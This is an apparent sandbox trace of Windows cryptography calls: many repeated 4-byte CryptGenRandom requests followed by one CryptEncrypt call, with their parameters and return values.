[0163.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.216] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.216] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.216] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.216] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.216] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.216] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.216] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.216] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.216] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.216] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.216] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.216] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.216] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.216] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.216] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.216] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.216] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.216] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.216] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.216] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.216] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.216] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.216] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.216] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.216] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.216] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.216] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.216] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.216] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.216] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.216] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.216] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.216] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.216] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.216] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.216] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.216] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.216] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.216] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.216] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.216] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.216] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.216] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.216] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.216] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.216] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.216] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.216] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.216] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.216] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.216] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.217] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.217] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.217] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.217] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.217] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.217] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.217] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.217] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.217] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.217] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.217] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.217] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.217] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.217] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.217] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.217] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.217] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.217] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.217] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.217] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.217] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.217] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.217] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.217] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.217] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.217] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.217] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.217] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.217] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.217] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.217] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.217] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.217] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.217] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0163.217] 